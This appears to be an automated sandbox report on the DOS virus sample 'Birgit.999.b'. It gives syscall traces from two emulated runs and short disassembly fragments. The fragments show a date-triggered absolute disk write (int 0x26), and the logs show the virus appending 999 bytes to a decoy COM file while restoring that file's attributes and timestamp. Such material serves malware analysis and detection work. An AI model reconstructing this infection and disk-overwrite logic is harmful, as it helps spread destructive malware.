Sample viewer

vx.netlux.org/Virus.DOS.Birgit.999.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:38.586249596Z 42 PC: 12ba6 | Get date 0x12ba6: cmp dl, 0x12
0x12ba9: jne 0x12bb2
0x12bab: mov cx, 0xffff
0x12bae: mov al, 2
0x12bb0: int 0x26
0x12bb2: popaw
0x12bb3: call 0x12bbb
0x12bb6: jmp 0x12be8
0x12bb8: nop
0x12bb9: pop ss
0x12bba: pushaw
0x12bbc: mov dx, word ptr ds:[bp + 0x136]
0x12bc1: jmp 0x12bc8
0x12bc3: nop
0x12bc4: mov ah, 0x4c
0x12bc6: int 0x21
0x12bc8: mov cx, 0x7c
0x12bcb: lea si, word ptr [bp + 0x165]
0x12bcf: mov di, si
0x12bd1: int3
2018-12-17T22:51:38.588538456Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.589767443Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.591059692Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.592268014Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.594410944Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.595748401Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.597161934Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.598998227Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.600185459Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.601508322Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.603600112Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.605433157Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.607339156Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.609912859Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.611301156Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.612694737Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.614113747Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.622283574Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.624058505Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.62609395Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.62854308Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.6303587Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.632261094Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.635367859Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.637305192Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.63929672Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.642195772Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.658611214Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.66036078Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.663139676Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.664728998Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.666215657Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.66786217Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.670050017Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.671704226Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.673370501Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.675734572Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.677377192Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.67920462Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.681510913Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.683447169Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.685356728Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.68795409Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.689953027Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.691943294Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.694863702Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.69647679Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.698177466Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.701427405Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.703153447Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.704775864Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.70640202Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.708656391Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.710289062Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.711912386Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.714462902Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.716395676Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.718312867Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.720599037Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.722729252Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.724633687Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.727344461Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.729596315Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.731531702Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.733659961Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.751695305Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.753337764Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.754945897Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.757403616Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.758973186Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.760299561Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.762188954Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.764328624Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.766184218Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.768474262Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.770409421Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.77224343Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.774734802Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.776531544Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.778384578Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.78088009Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.782890753Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.784880404Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.786872129Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.789876511Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.791973944Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.793997638Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.797264574Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.799443793Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.801605373Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.80458224Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.80660814Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.808612926Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.811603634Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.81320164Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.815989708Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.818599315Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.82031643Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.821965645Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.824366461Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.826505417Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.828765481Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.831051336Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.833522094Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.835707354Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.837887878Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.841186693Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.843373378Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.845532527Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.848587141Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.851119892Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.853343511Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.85624696Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.85870349Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.860891665Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.863547673Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.865800899Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.867981037Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.870162266Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.873388977Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.875563123Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.877720441Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.880889046Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.8830961Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.885349927Z 44 PC: 12c04 | Get time 0x12c04: mov word ptr ds:[bp + 0x136], dx
0x12c09: jmp 0x12c0b
0x12c0b: mov ax, 0x4e00
0x12c0e: mov cx, 0
0x12c11: lea dx, word ptr [bp + 0x1e8]
0x12c15: int 0x21
0x12c17: jae 0x12c1c
0x12c19: jmp 0x12d1f
0x12c1c: push 0x4300
0x12c1f: pop ax
0x12c20: mov dx, 0x9e
0x12c23: int 0x21
0x12c25: mov word ptr ds:[bp + 0x349], cx
0x12c2a: mov ax, 0x4301
0x12c2d: mov cx, 0
0x12c30: int 0x21
0x12c32: mov ax, 0x3d02
0x12c35: mov dx, 0x9e
0x12c38: int 0x21
0x12c3a: push ax
2018-12-17T22:51:38.888678595Z 78 PC: 12c17 | Find first file
2018-12-17T22:51:38.895626356Z 67 PC: 12c25 | Get or set file attributes
2018-12-17T22:51:38.902307986Z 67 PC: 12c32 | Get or set file attributes
2018-12-17T22:51:38.920770661Z 61 PC: 12c3a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:38.928469511Z 63 PC: 12c49 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:38.935954816Z 87 PC: 12c94 | Get or set file date and time
2018-12-17T22:51:38.938464981Z 66 PC: 12ca7 | Move file pointer
2018-12-17T22:51:38.940337581Z 64 PC: 12cb4 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T22:51:38.943632019Z 64 PC: 12cd3 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:51:38.947744691Z 64 PC: 12ce0 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T22:51:38.957658946Z 66 PC: 12ceb | Move file pointer
2018-12-17T22:51:38.959995511Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.963042786Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.965545674Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.967686179Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.970605134Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.973088175Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.975241087Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.978257101Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.980766441Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.982919624Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.986950853Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.989648419Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.991808525Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.993997783Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.996881376Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.999026869Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.001118848Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.00383094Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.0057829Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.007934386Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.011073855Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.013244074Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.015386721Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.018513247Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.020663865Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.022773425Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.025698834Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.02811358Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.03019606Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.032956943Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.03499235Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.037020953Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.039880878Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.042331691Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.04447061Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.047102027Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.062711119Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.064683321Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.066896141Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.069023762Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.071046069Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.085899443Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.088504968Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.090467037Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.094850824Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.097282451Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.099291033Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.101518159Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.104233956Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.10728517Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.109721818Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.111986135Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.114353316Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.116372625Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.119026265Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.120735275Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.122384008Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.125113815Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.127614472Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.129747154Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.133340079Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.135674872Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.137729011Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.140500077Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.142735992Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.144903763Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.148182356Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.150336962Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.152451072Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.155654248Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.157748371Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.159850782Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.163038634Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.165178645Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.16730515Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.170766638Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.173260146Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.175410389Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.178824958Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.181287692Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.183400129Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.186293235Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.188759395Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.190887889Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.193821849Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.196301969Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.198437379Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.20161756Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.203861652Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.206005295Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.208960619Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.212201322Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.214791073Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.216490474Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.219268296Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.221829667Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.223571001Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.226300564Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.228128161Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.229916183Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.232410794Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.234212455Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.236183073Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.239311807Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.241364989Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.243300231Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.246165259Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.248440658Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.250367359Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.253114327Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.255333337Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.257252639Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.260008506Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.262244282Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.264163568Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.269625613Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.271867034Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.274230551Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.276375236Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.27916645Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.28150584Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.2834282Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.286402871Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.288325409Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.29024084Z 64 PC: 12cfb | Write file or device (Write 999 bytes on handle 5)
2018-12-17T22:51:39.301118465Z 87 PC: 12d0c | Get or set file date and time
2018-12-17T22:51:39.302831297Z 62 PC: 12d11 | Close file
2018-12-17T22:51:39.320100097Z 67 PC: 12d1f | Get or set file attributes
2018-12-17T22:51:39.33205977Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:51:39.337000878Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10628,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:38.554387408Z 42 PC: 12ba6 | Get date 0x12ba6: cmp dl, 0x12
0x12ba9: jne 0x12bb2
0x12bab: mov cx, 0xffff
0x12bae: mov al, 2
0x12bb0: int 0x26
0x12bb2: popaw
0x12bb3: call 0x12bbb
0x12bb6: jmp 0x12be8
0x12bb8: nop
0x12bb9: pop ss
0x12bba: pushaw
0x12bbc: mov dx, word ptr ds:[bp + 0x136]
0x12bc1: jmp 0x12bc8
0x12bc3: nop
0x12bc4: mov ah, 0x4c
0x12bc6: int 0x21
0x12bc8: mov cx, 0x7c
0x12bcb: lea si, word ptr [bp + 0x165]
0x12bcf: mov di, si
0x12bd1: int3
2018-12-25T12:28:38.558794176Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-25T12:28:38.56014178Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.561453476Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.563313606Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.564622643Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.565926149Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.56845022Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.569979919Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.571360849Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.587379848Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.58933535Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.591038913Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.592885321Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.59491405Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.596588374Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.598269748Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.600687788Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.602148369Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.603580632Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.605449575Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.60732613Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.609055343Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.611693621Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.613227714Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.61473744Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.621658295Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.624041794Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.626768951Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.63058025Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.632530268Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.634040295Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.641332822Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.642932345Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.644317418Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.654663431Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.656472926Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.658204585Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.66069872Z 68 PC: 12be3 | I/O control for devices (See above)
